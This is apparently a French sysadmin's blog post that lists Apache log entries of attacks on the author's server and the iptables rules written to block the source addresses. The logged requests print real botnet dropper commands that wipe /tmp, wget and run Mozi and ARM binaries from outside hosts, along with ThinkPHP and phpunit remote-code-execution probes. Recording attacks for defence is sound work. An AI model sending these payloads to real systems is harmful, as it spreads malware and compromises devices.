Voici la liste :

61.242.40.137 - - [31/May/2021:06:04:31 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world"
27.45.11.127 - - [31/May/2021:06:52:00 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://27.45.11.127:48083/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world"
209.141.33.232 - - [21/May/2021:03:57:39 +0200] "GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\\/45.14.149.244/arm7;chmod+777+arm7;./arm7+starcam;wget+http:/\\/45.14.149.244/arm;chmod+777+arm;./arm+starcam HTTP/1.1" 400 0 "-" "Pe7kata"
182.121.231.1 - - [21/May/2021:04:07:59 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://182.121.231.1:59816/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world"
209.141.33.232 - - [21/May/2021:13:18:53 +0200] "GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\\/45.14.149.244/arm7;chmod+777+arm7;./arm7+starcam;wget+http:/\\/45.14.149.244/arm;chmod+777+arm;./arm+starcam HTTP/1.1" 400 0 "-" "Pe7kata"
209.141.33.232 - - [21/May/2021:14:34:29 +0200] "GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\\/45.14.149.244/arm7;chmod+777+arm7;./arm7+starcam;wget+http:/\\/45.14.149.244/arm;chmod+777+arm;./arm+starcam HTTP/1.1" 400 0 "-" "Pe7kata"
223.149.149.208 - - [21/May/2021:22:16:38 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world"
103.203.72.91 - - [20/May/2021:06:12:05 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world"
119.123.236.177 - - [20/May/2021:15:52:53 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://119.123.236.177:38918/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world"
117.241.51.177 - - [18/May/2021:17:30:58 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://117.241.51.177:45448/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world"
27.5.37.175 - - [18/May/2021:19:41:00 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://27.5.37.175:46657/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world"
59.97.193.131 - - [17/May/2021:06:05:42 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://59.97.193.131:57363/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world"
138.204.132.98 - - [28/May/2021:20:03:35 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+ http://212.192.241.127/eb0t.sh;chmod+777+/tmp/eb0t.sh;sh+/tmp/eb0t.sh" 400 0 "-" "-"
59.63.206.200 - - [26/May/2021:00:59:08 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://101.232.115.188:57082/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world"
114.33.156.230 - - [26/May/2021:09:57:41 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://114.33.156.230:59246/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world"
68.150.109.112 - - [26/May/2021:17:05:02 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+185.172.111.214/bins/UnHAnaAW.x86;chmod+777+/tmp/UnHAnaAW.x86;sh+/tmp/UnHAnaAW.x86+w00dy.jaws HTTP/1.1" 404 488 "-" "Hello, world"
209.141.33.232 - - [25/May/2021:02:00:39 +0200] "GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\\/45.14.149.244/arm7;chmod+777+arm7;./arm7+starcam;wget+http:/\\/45.14.149.244/arm;chmod+777+arm;./arm+starcam HTTP/1.1" 400 0 "-" "Pe7kata"
209.141.33.232 - - [24/May/2021:03:15:26 +0200] "GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\\/45.14.149.244/arm7;chmod+777+arm7;./arm7+starcam;wget+http:/\\/45.14.149.244/arm;chmod+777+arm;./arm+starcam HTTP/1.1" 400 0 "-" "Pe7kata"
209.141.33.232 - - [24/May/2021:05:17:24 +0200] "GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\\/45.14.149.244/arm7;chmod+777+arm7;./arm7+starcam;wget+http:/\\/45.14.149.244/arm;chmod+777+arm;./arm+starcam HTTP/1.1" 400 0 "-" "Pe7kata"
209.141.33.232 - - [23/May/2021:11:11:12 +0200] "GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\\/45.14.149.244/arm7;chmod+777+arm7;./arm7+starcam;wget+http:/\\/45.14.149.244/arm;chmod+777+arm;./arm+starcam HTTP/1.1" 400 0 "-" "Pe7kata"
209.141.33.232 - - [22/May/2021:12:33:25 +0200] "GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\\/45.14.149.244/arm7;chmod+777+arm7;./arm7+starcam;wget+http:/\\/45.14.149.244/arm;chmod+777+arm;./arm+starcam HTTP/1.1" 400 0 "-" "Pe7kata"

A noter que l’IP 45.14.149.244 est en Roumanie et 27.45.11.127 est en Chine.

Bilan :

iptables -A INPUT -s 45.14.149.244   -j DROP 
iptables -A INPUT -s 209.141.33.232   -j DROP
iptables -A INPUT -s 68.150.109.112    -j DROP 
iptables -A INPUT -s 114.33.156.230    -j DROP
iptables -A INPUT -s 59.63.206.200    -j DROP 
iptables -A INPUT -s 59.97.193.131    -j DROP
iptables -A INPUT -s 117.241.51.177    -j DROP
iptables -A INPUT -s 119.123.236.177     -j DROP
iptables -A INPUT -s 27.5.37.175    -j DROP
iptables -A INPUT -s 27.45.11.127    -j DROP
iptables -A INPUT -s 61.242.40.137     -j DROP
iptables -A INPUT -s 182.121.231.1      -j DROP
iptables-save > /etc/iptables/rules.v4

Misère.

Voici la liste :

# zgrep "HNAP1" /var/log/apache2/access.*.log.*.gz | sed 's/:/ /g' | awk '{print $2}' | sort -n | uniq -c
      2 45.15.18.3
      1 49.143.32.6
      2 84.17.42.11
      1 101.0.54.165
      1 113.220.18.13
      2 151.106.8.41
      1 182.119.98.177
      1 103.91.80.2 --> Inde

Action, blocage de ses IP :

iptables -A INPUT -s 45.15.18.3  -j DROP 
iptables -A INPUT -s 49.143.32.6  -j DROP 
iptables -A INPUT -s 84.17.42.11  -j DROP
iptables -A INPUT -s 101.0.54.165  -j DROP
iptables -A INPUT -s 113.220.18.13  -j DROP 
iptables -A INPUT -s 151.106.8.41  -j DROP 
iptables -A INPUT -s 182.119.98.177  -j DROP
iptables -A INPUT -s 103.91.80.2  -j DROP
iptables-save > /etc/iptables/rules.v4

A noter que 84.17.42.11 c’est en France ….

Misère.

Encore une attaque de la Russie, il me faudrait bloquer toutes les IP des Russes ….

Type d’attaque :

GET /?XDEBUG_SESSION_START=phpstorm
GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1
GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1
GET /wp-content/plugins/wp-file-manager/readme.txt
POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
GET /_ignition/execute-solution HTTP/1.1"
GET /solr/admin/info/system?wt=json HTTP/1.1
GET /console/ HTTP/1.1
POST /api/jsonws/invoke HTTP/1.1
GET /index.php?r=user%2Fauth%2Flogin HTTP/1.1

Quand je fais une recherche c’est pas la seule IP :

# zgrep "HelloThinkCMF" /var/log/apache2/access.humhub.log.*.gz | sed 's/:/ /g' | awk '{print $2}' | sort -n | uniq -c
     20 45.146.164.125
      2 45.146.164.131
      2 45.155.205.109
      4 45.155.205.181
      4 45.155.205.196
      1 123.58.4.233

Bilan :

iptables -A INPUT -s 45.146.164.125  -j DROP
iptables -A INPUT -s 45.146.164.131  -j DROP
iptables -A INPUT -s 45.155.205.109  -j DROP
iptables -A INPUT -s 45.155.205.181  -j DROP 
iptables -A INPUT -s 45.155.205.196  -j DROP
iptables -A INPUT -s 123.58.4.233  -j DROP 
iptables-save > /etc/iptables/rules.v4

Misère.